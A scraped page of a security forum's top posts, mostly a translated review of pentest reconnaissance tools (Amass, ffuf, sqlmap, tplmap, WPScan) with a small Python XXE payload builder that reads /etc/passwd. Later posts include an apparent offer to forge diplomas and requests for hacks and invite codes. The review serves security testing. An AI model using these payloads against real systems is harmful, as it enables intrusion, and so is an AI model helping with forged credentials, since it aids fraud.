* Open-source searches - Ask, Baidu, Bing, CommonCrawl, DNSDB, DNSDumpster, DNSTable, Dogpile, Exalead, FindSubdomains, Google, IPv4Info, Netcraft, PTRArchive, Riddler, SiteDossier, ThreatCrowd, VirusTotal, Yahoo;
* TLS certificate database searches - Censys, CertDB, CertSpotter, Crtsh, Entrust;
* Search engine APIs - BinaryEdge, BufferOver, CIRCL, HackerTarget, PassiveTotal, Robtex, SecurityTrails, Shodan, Twitter, Umbrella, URLScan;
* Internet web archives - ArchiveIt, ArchiveToday, Arquivo, LoCArchive, OpenUKArchive, UKGovArchive, Wayback;
Integration with Maltego;
Provides the most complete coverage for DNS subdomain discovery.
Cons:
Be careful with amass.netdomains - it will try to reach every IP address in the identified infrastructure and obtain domain names from reverse DNS queries and TLS certificates. This is a "loud" technique and can reveal your reconnaissance to the organization under study.
High memory consumption - up to 2 GB of RAM depending on the settings, which makes it impossible to run this tool in the cloud on a cheap VDS.

Altdns
Altdns is a Python tool for building dictionaries for DNS subdomain brute forcing. It can generate many subdomain candidates using mutations and permutations: words frequently found in subdomains (for example: test, dev, staging) are combined with the already-known subdomains supplied as input. The output is a list of subdomain variations that may exist, which can later be fed into a DNS brute forcer.
Pros:
Works well with large data sets.
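As an illustration of the kind of mutation Altdns performs, a simplified sketch (this is not Altdns's actual code; function and variable names are made up for illustration) might combine known subdomains with common words in a few positions:

```python
# Simplified sketch of Altdns-style subdomain permutation
# (illustrative only; not the actual Altdns implementation).

def permute_subdomains(known, words):
    """Combine known subdomains with common words in several positions."""
    candidates = set()
    for sub in known:
        label, _, domain = sub.partition(".")
        for w in words:
            candidates.add(f"{w}.{sub}")             # prepend as a new label
            candidates.add(f"{w}-{label}.{domain}")  # dash-prefix the label
            candidates.add(f"{label}-{w}.{domain}")  # dash-suffix the label
    return sorted(candidates)

candidates = permute_subdomains(["api.example.com"], ["dev", "staging"])
# Candidates include e.g. "dev.api.example.com" and "api-dev.example.com",
# ready to be fed into a DNS brute forcer such as MassDNS.
```

The real tool applies many more mutation rules (number increments, common separators, word insertion at every label position), but the principle is the same: expand known names into plausible neighbors.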
aquatone
aquatone was previously better known as yet another subdomain-discovery tool, but the author himself dropped that functionality in favor of the aforementioned Amass. aquatone has since been rewritten in Go and is now geared toward preliminary reconnaissance of websites: it goes through the specified domains, looks for websites on different ports, then collects all of the information about each site and takes a screenshot. It is convenient for quick preliminary exploration, after which you can select priority targets for attack.
Pros:
On output it creates a group of files and folders that are convenient to use in further work with other tools:
* an HTML report with the collected screenshots and response headers, grouped by similarity;
* a file with all of the URLs where websites were found;
* a file with statistics and page data;
* a folder with files containing the response headers from the discovered targets;
* a folder with files containing the response bodies from the discovered targets;
* screenshots of the discovered websites;
Supports XML reports from Nmap and Masscan as input;
Uses headless Chrome/Chromium to render screenshots.
Cons:
It may attract the attention of intrusion detection systems, and therefore requires tuning.
The screenshot below was taken with one of the old versions of aquatone (v0.5.0), which still implemented DNS subdomain discovery. Older versions can be found on the releases page.
Screenshot: aquatone v0.5.0

MassDNS
MassDNS is another tool for discovering DNS subdomains. Its main difference is that it sends DNS queries directly to many different DNS resolvers, and does so at considerable speed.
Pros:
Fast - able to resolve more than 350 thousand names per second.
Cons:
MassDNS can put a significant load on the DNS resolvers it uses, which can lead to those servers banning you or to complaints to your ISP.
In addition, it will put a heavy load on the target company's own DNS servers, if they have them and they are authoritative for the domains you are trying to resolve.
The bundled resolver list is currently outdated, but if you remove the broken DNS resolvers and add known-good new ones, everything will be fine.

nsec3map
nsec3map is a Python tool for obtaining a complete list of domains protected by DNSSEC.
Pros:
Quickly discovers hosts in DNS zones with a minimal number of queries if DNSSEC support is enabled in the zone;
Ships with a plugin for John the Ripper that can be used to crack the resulting NSEC3 hashes.
Cons:
Many DNS errors are handled incorrectly;
There is no automatic parallelization of NSEC record processing - you have to split the namespace manually;
High memory consumption.

Acunetix
Acunetix is a web vulnerability scanner that automates the process of checking web application security. It tests the application for SQL injection, XSS, XXE, SSRF, and many other web vulnerabilities. Like any other multi-vulnerability web scanner, however, it does not replace the pentester, since it cannot find complex vulnerability chains or logic flaws. But it covers a lot of different vulnerabilities, including various CVEs the pentester might have forgotten about, so it is very convenient for offloading routine checks.
Pros:
Low false-positive rate;
Results can be exported as reports;
Performs a large number of checks for different vulnerabilities;
Parallel scanning of multiple hosts.
Cons:
There is no deduplication algorithm (Acunetix treats pages with identical functionality as different because different URLs lead to them), though the developers are working on it;
Requires installation on a separate web server, which complicates testing client systems over a VPN connection and using the scanner inside an isolated segment of the client's local network;
It can be "noisy" toward the service under study, for example by sending too many attack vectors to the contact form on the site, thereby seriously disrupting business processes;
It is a proprietary and, accordingly, non-free solution.

Dirsearch
Dirsearch is a Python tool for brute forcing directories and files on websites.
Pros:
It can distinguish genuine "200 OK" pages from "200 OK" pages that actually contain "page not found" text;
It ships with a handy dictionary that strikes a good balance between size and search efficiency, containing standard paths typical of many CMSes and technology stacks;
Its own dictionary format allows good efficiency and flexibility in enumerating files and directories;
Convenient output - plain text or JSON;
Supports throttling - a pause between requests, which is vital for any weak service.
Cons:
Extensions must be passed as a single string, which is inconvenient when you need to supply many extensions at once;
To use your own dictionary, you will need to convert it slightly to the Dirsearch dictionary format for maximum efficiency.

wfuzz
wfuzz is a Python web fuzzer, probably one of the best known. The principle is simple: wfuzz can fuzz any part of an HTTP request, which makes it possible to fuzz GET/POST parameters and HTTP headers, including cookies and other authentication headers. At the same time it is convenient for plain brute forcing of directories and files, for which you need a good dictionary.
It also has a flexible filtering system with which you can filter website responses by various criteria, which makes it possible to achieve effective results.
Pros:
Multifunctional - a modular structure; assembling a scan takes a few minutes;
A convenient filtering and fuzzing mechanism;
You can fuzz any HTTP method, and any part of an HTTP request.
Cons:
Still under development.

ffuf
ffuf is a web fuzzer written in Go, created in the image of wfuzz. It can brute force files, directories, URL paths, names and values of GET/POST parameters, and HTTP headers, including the Host header for virtual-host discovery. It differs from wfuzz in higher speed and some new features; for example, Dirsearch-format dictionaries are supported.
Pros:
Filters similar to wfuzz's, allowing flexible configuration of the brute force;
Can fuzz HTTP header values, POST request data, and various parts of the URL, including the names and values of GET parameters;
Any HTTP method can be specified.
Cons:
Still under development.

gobuster
gobuster is a Go reconnaissance tool with two modes of operation: the first is used to brute force files and directories on a website, the second to enumerate DNS subdomains. The tool deliberately does not support recursive enumeration of files and directories, which saves time, but on the other hand the brute force of each newly found endpoint has to be launched separately.
Pros:
High speed both for DNS subdomain brute forcing and for file and directory brute forcing.
Cons:
The current version does not support setting HTTP headers;
By default, only some HTTP status codes (200, 204, 301, 302, 307) are considered valid.

Arjun
Arjun is a tool for brute forcing hidden HTTP parameters in GET/POST requests, as well as in JSON bodies.
Its built-in dictionary has 25,980 words, which Arjun checks in roughly 30 seconds. The trick is that Arjun does not check each parameter separately but sends about 1,000 parameters at a time and watches whether the response changes. If it does, Arjun splits those 1,000 parameters into two halves and checks which half affects the response. Thus, using a simple binary search, it finds the parameter (or several hidden parameters) that influenced the response and therefore may exist.
Pros:
High speed thanks to binary search;
Support for GET/POST parameters as well as parameters in JSON form.
The Burp Suite plugin param-miner works on the same principle and is also very good at finding hidden HTTP parameters; we will say more about it in the upcoming article about Burp and its plugins.

LinkFinder
LinkFinder is a Python script for finding links in JavaScript files. It is useful for discovering hidden or forgotten endpoints/URLs in a web application.
Pros:
Fast;
There is a dedicated Chrome plugin based on LinkFinder.
Cons:
Inconvenient output;
Does not analyze JavaScript dynamically;
Fairly simple link-search logic - if the JavaScript is obfuscated in some way, or the links are generated dynamically rather than present in the source, it will not find anything.

JSParser
JSParser is a Python script that uses Tornado and JSBeautifier to extract relative URLs from JavaScript files. It is very useful for discovering AJAX requests and compiling a list of API methods the application interacts with. It works effectively in tandem with LinkFinder.
Pros:
Fast parsing of JavaScript files.

sqlmap
sqlmap is probably one of the best-known tools for analyzing web applications. It automates the discovery and exploitation of SQL injections, works with several SQL dialects, and has a huge number of techniques in its arsenal, ranging from straightforward quote probes to complex vectors for time-based SQL injection.
In addition, it has many post-exploitation techniques for various DBMSes, so it is useful not only as a SQL injection scanner but also as a powerful tool for exploiting SQL injections that have already been found.
Pros:
A large number of different techniques and vectors;
A low number of false positives;
Many fine-tuning options: various techniques, target database, tamper scripts for bypassing WAFs;
Can dump the retrieved data;
Many exploitation capabilities; for some DBMSes, for example, automatic file upload/download, command execution (RCE), and more;
Supports direct connection to the database using credentials obtained during the attack;
You can feed it a text file with Burp results as input - no need to compose all of the command-line attributes manually.
Cons:
Difficult to customize, for example to write checks of your own, because the documentation for that is poor;
Without the appropriate settings it runs an incomplete set of checks, which can be misleading.

NoSQLMap
NoSQLMap is a Python tool for automating the discovery and exploitation of NoSQL injection. It is convenient not only against NoSQL databases directly but also when auditing web applications that use NoSQL.
Pros:
Like sqlmap, it not only finds a potential vulnerability but also checks whether it can be exploited, for MongoDB and CouchDB.
Cons:
Does not support NoSQL injection for Redis or Cassandra; work in this direction is ongoing.

oxml_xxe
oxml_xxe is a tool for embedding XXE XML exploits into various file types that use the XML format in some form.
Pros:
Supports many common formats, such as DOCX, ODT, SVG, XML.
Cons:
PDF, JPEG, GIF are not fully supported;
Creates only one file at a time. To solve this problem you can use the docem tool, which can create a large number of files with payloads in different places.
The utilities above do an excellent job of XXE testing when documents containing XML are uploaded.
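For reference, the classic XXE payload such tools embed declares an external entity and references it from the document body. A minimal sketch follows (the target file path and entity name are illustrative; real tools wrap a payload like this inside DOCX/ODT/SVG containers):

```python
# Minimal classic XXE payload construction (illustrative sketch;
# not code from oxml_xxe or docem).

def build_xxe_payload(target_file="/etc/passwd", entity="xxe"):
    """Return an XML document whose external entity reads a local file."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE root [<!ENTITY {entity} SYSTEM "file://{target_file}">]>\n'
        f"<root>&{entity};</root>\n"
    )

payload = build_xxe_payload()
# If a vulnerable parser expands the entity, the file contents
# appear in the parsed <root> element.
```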
But do not forget that XML handlers can show up in many other places; for example, XML can be used as a data format instead of JSON. We therefore recommend paying attention to the following repository, which contains a large variety of payloads: PayloadsAllTheThings.

tplmap
tplmap is a Python tool for automatically detecting and exploiting Server-Side Template Injection (SSTI) vulnerabilities. Its settings and flags are similar to sqlmap's. It uses several different techniques and vectors, including blind injection, and also has techniques for executing code and uploading/downloading arbitrary files. Its arsenal covers a dozen different template engines, plus some techniques for finding eval()-like code injection in Python, Ruby, PHP, and JavaScript. On successful exploitation it opens an interactive console.
Pros:
A large number of different techniques and vectors;
Supports many template engines;
Many exploitation techniques.

CeWL
CeWL is a dictionary generator written in Ruby, created to extract unique words from a given website by following the site's links to a specified depth. The compiled dictionary of unique words can later be used to brute force passwords on services, to brute force files and directories on the same website, or to attack hashes obtained with hashcat or John the Ripper. It is useful for compiling a "targeted" list of candidate passwords.
Pros:
Easy to use.
Cons:
You need to be careful with the crawl depth so as not to pull in an extra domain.

Weakpass
Weakpass is a service hosting many dictionaries of unique passwords. It is extremely useful for all kinds of password-cracking tasks, from simple online brute forcing of accounts on target services to offline brute forcing of hashes with hashcat or John the Ripper. It holds about 8 billion passwords of 4 to 25 characters in length.
Pros:
Contains both specialized dictionaries and dictionaries of the most common passwords, so you can pick the right dictionary for your needs;
The dictionaries are updated and extended with new passwords;
The dictionaries are sorted by efficiency, so you can pick one for a quick online brute force or for a thorough password search against the extensive dictionary built from the latest leaks;
There is a calculator that estimates how long a password brute force would take on your hardware.

In a separate group we would like to highlight the tools for CMS checks: WPScan, JoomScan, and AEM hacker.

AEM hacker
AEM hacker is a tool for detecting vulnerabilities in Adobe Experience Manager (AEM) applications.
Pros:
Can detect AEM applications from a list of URLs supplied as input;
Contains scripts for obtaining RCE by uploading a JSP shell or exploiting SSRF.

JoomScan
JoomScan is a Perl tool for automating vulnerability detection in Joomla CMS deployments.
Pros:
Able to find configuration flaws and problems with admin settings;
Lists Joomla versions and their associated vulnerabilities, and likewise for individual components;
Contains more than 1,000 exploits for Joomla components;
Outputs final reports in text and HTML formats.

WPScan
WPScan is a tool for scanning WordPress sites; it carries vulnerabilities for the WordPress engine itself as well as for some plugins.
Pros:
Able to enumerate not only unsafe WordPress plugins and themes but also user lists and TimThumb files;
Can conduct brute-force attacks against WordPress sites.
Cons:
Without the appropriate settings it runs an incomplete set of checks, which can be misleading.

In general, different people prefer different tools for their work: they are all good in their own way, and what suits one person may not suit another. If you think we have unfairly overlooked some good utility, tell us in the comments!
  38. 1 point
Say the word, boss, tell me where you want to graduate from, you little twerp, and I'll make you whatever diploma your little soul desires.
  39. 1 point
Over the last 2 weeks I did a bit of research into quantum computing, and the only application I could think of, given the experimental status of the technology, was an RNG. The project is hobby-level; the goal was not to pass the NIST statistical tests, just "for fun" https://github.com/cionutmihai/tigon You'll also find the journal there in PDF format, 57 pages, containing repos, resource links, and the full bibliography (70 titles). Obviously you can't reinvent computer science from your living room (with 200 EUR, a few books, and some YouTube or Coursera courses), so I stress again that it's amateur-level. On top of that, most of the available libraries are either in alpha, abandoned, or focused strictly on academia and simulations. Take care
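One classic post-processing step for the raw bits of any hardware or quantum RNG is von Neumann debiasing. This is a standard textbook technique, not code from the tigon repo, sketched here for illustration:

```python
# Von Neumann debiasing: a standard post-processing step for raw RNG bits
# (textbook technique; not taken from the tigon project).

def von_neumann_debias(bits):
    """Map bit pairs 01 -> 0 and 10 -> 1; discard 00 and 11.
    Removes bias if the input bits are independent and identically biased."""
    out = []
    for a, b in zip(bits[::2], bits[1::2]):
        if a != b:
            out.append(a)
    return out

debiased = von_neumann_debias([0, 1, 1, 1, 1, 0, 0, 0, 0, 1])
# Pairs: (0,1)->0, (1,1)->discard, (1,0)->1, (0,0)->discard, (0,1)->0
# so debiased == [0, 1, 0]
```

The cost is throughput (at least three quarters of the bits are discarded on average), which is why production designs usually prefer cryptographic extractors, but it is a good first sanity step for a hobby device.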
  40. 1 point
You can find it here. Every refresh gives you a different hack.
  41. 1 point
Contact me bro, I have good software and it's free to use!!
  42. 1 point
Ok, I rarely see people around here accept criticism and treat it as something constructive, so well done, good start. I didn't want to waste my time initially, but now maybe some of this will stick. Advice (take it with a grain of salt; I'm no expert in the field, but I've been through similar processes):
1. Remove the hyperlink to your site from this thread; it doesn't put you in a positive light. Someone who wants to see who they're dealing with before spending a cent and searches for you on Google will see that you're in the same situation as the people you want to help, yet you can't help yourself. Blind leading the blind, if you catch my drift. Say you're a small business that wants to "maximize revenue through technical solutions" as you put it above, including "online marketing" and a "development plan" as your site says: those are exactly what you lack right now, and your plan was to spam people for lack of better ideas. If another small business pays you to promote them, what do you do? Start spamming people on their behalf? Anyway, leaving aside the irony of your situation, back to something more constructive:
2. From the first seconds someone comes into contact with you or your site (we can't really speak of a "brand" yet), you must highlight what makes you different (in a good way) from the thousands of other self-proclaimed experts, why it's worth their time to listen to you at all (time is money), and then why they should give you money. In other words, what is your USP (Unique Selling Point)? Then the client should quickly understand how you can use that USP to help them. The site is very generic and "cold"; it doesn't come across exactly and concretely what you offer, how, and how you specifically help potential clients.
3. Know your competition, do your homework. Look at who you'd be up against in your niche. See what they do well (in terms of their site and how they promote themselves) and try to adapt (not copy) it to your context. See what they lack (put yourself in a potential client's shoes) and what you don't like, what would convince you to become their client, etc., and act on that in your own business. Also run a small test with friends, relatives, family, etc.: ask them to imagine they're small entrepreneurs, give them the profile of your ideal client, and then have them tell you honestly whether they'd use your services or someone else's, what would convince them to come to you, and so on.
4. Know your operating environment, namely Romania - the culture you operate in. In these circumstances, business still runs heavily on recommendations, on word of mouth from your first clients. In other countries people check rating sites, or in the old days Yelp/Yellow Pages, etc. At the start you need to build a strong base, both financially and in terms of testimonials. Besides the relationships you need to develop, on the site you have to explain concretely what you've done, so that even the dimmest visitor understands. Putting up some "David, Constanța", "Mariana, Pitesti", "Carmen, Ilfov" is worth absolutely nothing; it has zero credibility - anyone can write lines like that and add unlimited names and locations. If you look at professional sites, they have "case studies". These should be kept concise and follow the STAR method (Situation, Task, Action, Result): what problems the client had when they came to you (this way potential clients relate more easily and see themselves in the shoes of those who hired you); then what they asked you to do (subconsciously this shows they could trust you with x, y, z); how you acted (here's your chance to show how creative you are, etc.); and then the result (this is the final "selling" point that convinces the average Joe that they too can get the same result or better by using your services). I've had companies in the past offer me considerable discounts in exchange for such case studies or testimonials. These can be something graphic and concise in a PDF, or a very short clip, or a combination, depending on the need.
5. Get up to speed with all the efficient methods (in terms of time, cost, etc., including their weaknesses) of delivering what you want to offer. I don't want to repeat point 1 above, but you need to know your trade if you want to survive. It's a continuous process - you'll never know enough - but every client must see that you know your field. Charlatans survive only off fools who don't know better. Don't get me wrong, there's plenty of money to be made off fools too (e.g. https://www.fiverr.com/gabonne), but I assume you don't want to focus on that "niche". You say you offer IT support, online marketing, brand identity, app development, and development plans - in my view you get there over time, once you have at least 50 employees. If someone comes to you wanting the full range for a small window-fitting company, what do you do - waste their time and money, or turn them down because you have no clue? For example, if besides a company intranet they want daily backup solutions, a bespoke CRM app, payments, suppliers, etc., plus an online development plan, you must actually be able to deliver what you claim to offer. And these days, to keep you on as a supplier, people also expect advice (mini-consulting) to come with the product, to see that you care about them. For example, you tell them: we can do it your way (a full daily backup, say), but you could also do incremental backups (faster, more cost-efficient, etc.). In fields like this you also become a kind of consultant, and if you have no idea what you're talking about, you just waste their time and money and then get the boot. Focus on something you know very well, and then you can grow organically. You can build partnerships with people who are good in other areas - the better you collaborate, the better off you are. That's about it for now on the site and on you... when/if I feel like it, I'll write something about promotion ideas too.
  43. 1 point
:))))))) we're doomed.
  44. 1 point
  45. 1 point
Something new: hackyard. Something ethical: hackpedia. Something good: RST. Compare them yourselves. That's what I liked here, the blackhat side. You learn a lot more that way than on the ethical side. Freedom. The password part sounds good; I'll see what we can do in the coming days, not everything is ready yet. And I have more ideas.
  46. 0 points
I want to close my account on Romanian Security Team, how do I go about it?
  47. 0 points
I recommend XDA, as QKQL said. Look for a tutorial with positive reviews, because if you do the root wrong you might spend 2-3-4 days undoing it ^^
  48. -1 points
SEO, Benone, are you still breathing? There's a blog category around here
  49. -2 points
  50. -2 points
If someone could give me a FileList code too, please